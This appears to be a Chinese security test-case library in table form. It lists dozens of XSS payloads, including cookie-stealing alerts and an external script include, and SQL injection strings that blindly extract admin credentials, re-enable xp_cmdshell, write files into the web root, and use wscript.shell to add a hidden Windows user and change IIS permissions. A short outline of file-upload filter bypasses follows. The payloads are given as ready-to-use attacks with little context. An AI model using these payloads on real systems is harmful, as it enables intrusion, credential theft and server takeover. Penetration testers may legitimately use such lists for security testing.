XSS | |||
序号 | 用例 | ||
1 | "></iframe><script>alert(123)</script> | ||
2 | ">><script>alert('xss')</script> | ||
3 | "οnfοcus=alert(document.domain)"><" | ||
4 | %22%3cscript%3ealert(%22xss%22)%3c/script%3e | ||
5 | %3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e | ||
6 | %3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e | ||
7 | %3cscript%3ealert(%22xss%22)%3c/script%3e/index.html | ||
8 | %3Cscript%3Ealert('XSS')%3C/script%3E | ||
9 | );alert('XSS | ||
10 | /></a></><img src=1.gif οnerrοr=alert(1)> | ||
11 | ;exec%20master..xp_cmdshell%20'dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt'--&& | ||
12 | [color=red' οnmοuseοver="alert('XSS')"]mouse over[/color] | ||
13 | [url=javascript:alert('XSS');]click me[/url] | ||
14 | </textarea><script>alert(/xss)</script> | ||
15 | </title><script>alert(/xss/)</script> | ||
16 | <?='<SCRIPT>alert("XSS")</SCRIPT>'?> | ||
17 | <?echo('<src)'; echo('ipt>alert(\"xss\")';</script>');?> | ||
18 | <?echo('<src)'; echo('ipt>alert(\"xss\")';</script>');?> | ||
19 | <BASE href="javascript:alert('XSS');//"> | ||
20 | <BGSOUND src="javascript:alert('XSS');"> | ||
21 | <BODY BACKGROUND="javascript:alert('XSS')"> | ||
22 | <body onLoad="alert('XSS');" | ||
23 | <BODY ONLOAD=alert('XSS')> | ||
24 | <body οnunlοad="javascript:alert('XSS');"> | ||
25 | <br size=\"&{alert('xss')}\"> | ||
26 | <DIV STYLE="background-image: url(javascript:alert('XSS'))"> | ||
27 | <div style="x:expression((window==1)?":eval('r=1;alert(String.fromCharCode(83,83,83));'))"> | ||
28 | <IFRAME src=javascript:alert('XSS')></IFRAME> | ||
29 | <iframe<?php eval chr(11)?>οnlοad=alert('XSS')></iframe> | ||
30 | <IMG DYNSRC="javascript:alert('XSS')"> | ||
31 | <IMG LOWSRC=\"javascript:alert('XSS')\"> | ||
32 | <IMG src="jav ascript:alert('XSS');"> | ||
33 | <img src="javascript:alert('XSS')"> | ||
34 | <IMG src="javascript:alert('XSS');"> | ||
35 | <IMG SRC=\"jav�x9;ascript:alert('xss');\"> | ||
36 | <img src='java\nscript:alert(\"XSS\")'> | ||
37 | <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> | ||
38 | <IMG src=javascript:alert('XSS')> | ||
39 | <IMG src=JaVaScRiPt:alert('XSS')> | ||
40 | <img src=liu.jpg οnerrοr=alert(/xss/)/> | ||
41 | <IMG SRC='vbscript:msgbox(\"XSS\")'> | ||
42 | <IMG STYLE='xss:expre\ssion(alert("XSS"))'> | ||
43 | <LAYER src="http://xss.ha.ckers.org/a.js"></layer> | ||
44 | <LINK REL="stylesheet" href="javascript:alert('XSS');"> | ||
45 | <marquee><script>alert('xss')</script></marquee> | ||
46 | <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> | ||
47 | <scr<script>ipt>alert('xss');</scr</script>ipt> | ||
48 | <script>alert(document.cookie)</script> | ||
49 | <script>alert('XSS')</script> | ||
50 | <SCRIPT>document.write("<SCRI");</SCRIPT>PT src="http://test/test.js"></SCRIPT> | ||
51 | <script>var var=1; alert(var)</script> | ||
52 | <scrscriptipt>alert(1)</scrscriptipt> | ||
53 | <STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A class="XSS"></A> | ||
54 | <STYLE TYPE="text/javascript">alert('XSS');</STYLE> | ||
55 | <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> | ||
56 | <style>@im\port'\ja\vasc\ript:alert(\"xss\")';</style> | ||
57 | <TABLE BACKGROUND="javascript:alert('XSS')"> | ||
58 | <XML src="javascript:alert('XSS');"> | ||
59 | ='><script>alert(document.cookie)</script> | ||
60 | > <BODY ONLOAD=a();"><SCRIPT>function a(){alert('XSS');}</SCRIPT><" | ||
61 | >'"><img src="javascript:alert('xss')"> | ||
62 | ><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(XSS")> | ||
63 | ><script alert(String.fromCharCode(88,83,83))</script> | ||
64 | ><script>alert(1)</script> | ||
65 | ><script>alert(document.cookie)</script> | ||
66 | '>><marquee><h1>XSS<h1></marquee> | ||
67 | a?<script>alert('Vulnerable')</script> | ||
68 | Execute(MsgBox(chr(88)&&chr(83)&&chr(83)))< | ||
69 | getURL("javascript:alert('XSS')") | ||
70 | window.alert("XSS"); | ||
sql注入 | |||
序号 | 用例 | ||
1 | admin'-- | ||
2 | ' or 0=0 -- | ||
3 | " or 0=0 -- | ||
4 | or 0=0 -- | ||
5 | ' or 0=0 # | ||
6 | " or 0=0 # | ||
7 | or 0=0 # | ||
8 | ' or 'x'='x | ||
9 | " or "x"="x | ||
10 | ') or ('x'='x | ||
11 | ' or 1=1-- | ||
12 | " or 1=1-- | ||
13 | or 1=1-- | ||
14 | ' or a=a-- | ||
15 | " or "a"="a | ||
16 | ') or ('a'='a | ||
17 | ") or ("a"="a | ||
18 | hi" or "a"="a | ||
19 | hi" or 1=1 -- | ||
20 | hi' or 1=1 -- | ||
21 | hi' or 'a'='a | ||
22 | hi') or ('a'='a | ||
23 | hi") or ("a"="a | ||
24 | ; and 1=1 and 1=2 | ||
25 | and 0<>(select count(*) from *) | ||
26 | and 0<>(select count(*) from admin) | ||
27 | and 0<(select count(*) from admin) | ||
28 | and 1<(select count(*) from admin) | ||
29 | and 1=(select count(*) from admin where len(*)>0)-- | ||
30 | and 1=(select count(*) from admin where len(用户字段名称name)>0) | ||
31 | and 1=(select count(*) from admin where len(密码字段名称password)>0) | ||
32 | and 1=(select count(*) from admin where len(*)>0) | ||
33 | and 1=(select count(*) from admin where len(name)>6) 错误 | ||
34 | and 1=(select count(*) from admin where len(name)>5) 正确 长度是6 | ||
35 | and 1=(select count(*) from admin where len(name)=6) 正确 | ||
36 | and 1=(select count(*) from admin where len(password)>11) 正确 | ||
37 | and 1=(select count(*) from admin where len(password)>12) 错误 长度是12 | ||
38 | and 1=(select count(*) from admin where len(password)=12) 正确 | ||
39 | and 1=(select count(*) from admin where left(name,1)=a) ---猜解用户帐号的第一位 | ||
40 | and 1=(select count(*) from admin where left(name,2)=ab)---猜解用户帐号的第二位 | ||
41 | and 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) -- | ||
42 | and 1=(select @@VERSION)-- | ||
43 | and 1=(Select IS_SRVROLEMEMBER(sysadmin))-- | ||
44 | and sa=(Select System_user)-- | ||
45 | and user_name()=dbo-- | ||
46 | and 0<>(select user_name()-- | ||
47 | and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = X AND name = xp_cmdshell)-- | ||
48 | ;EXEC master.dbo.sp_addextendedproc xp_cmdshell,xplog70.dll-- | ||
49 | ;EXEC master.dbo.sp_addextendedproc xp_cmdshell,c:\inetpub\wwwroot\xplog70.dll-- | ||
50 | ;use master;declare @s int;exec sp_oacreate "wscript.shell",@s out;exec sp_oamethod @s,"run",NULL,"cmd.exe /c ping 192.168.0.1";-- | ||
51 | ;DECLARE @shell INT EXEC SP_OACreate wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add-- | ||
52 | ;declare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, cscript.exe c:\inetpub\wwwroot\mkwebdir.vbs -w "默认Web站点" -v "e","e:\"-- | ||
53 | declare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, cscript.exe c:\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse | ||
54 | and 0<>(select top 1 paths from newtable)-- | ||
55 | and 1=(select name from master.dbo.sysdatabases where dbid=7)-- | ||
56 | and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6) | ||
57 | and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=U) | ||
58 | and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=U and name not in (Admin)) | ||
59 | and 0<>(select count(*) from bbs.dbo.sysobjects where xtype=U and name=admin | ||
60 | and uid>(str(id))) | ||
61 | and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569) | ||
62 | and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569 and name not in | ||
上传漏洞 | |||
序号 | 用例 | ||
1 | 检查后缀 | 上传.htaccess | 黑名单 |
1 | 后缀大小写绕过 | 黑名单 | |
1 | 点绕过 | 黑名单 | |
1 | 空格绕过 | 黑名单 | |
1 | ::$DATA绕过 | 黑名单 | |
1 | 配合解析漏洞 | 黑名单 | |
1 | 双后缀名绕过 | 黑名单 | |
1 | MIME绕过 | 白名单 | |
1 | %00截断 | 白名单 | |
1 | 0x00截断 | 白名单 | |
1 | 0x0a截断 | 白名单 | |
1 | 检查内容 | 文件头检查 | |
1 | 突破getimagesize() | ||
1 | 突破exif_imagetype() | ||
1 | 二次渲染 | ||
1 | 其它 | 竞争条件 | |
1 | 上传文件是否有格式限制,是否可以上传exe文件; | ||
1 | 上传文件是否有大小限制,上传太大的文件是否导致异常错误,上传0K的文件是否会导致异常错误,上传并不存在的文件是否会导致异常错误; | ||
1 | 通过修改扩展名的方式是否可以绕过格式限制,是否可以通过压包方式绕过格式限制; | ||
1 | 上传文件大小大于本地剩余空间大小,是否会出现异常错误。 | ||
1 | gif文件头欺骗 |
安全用例库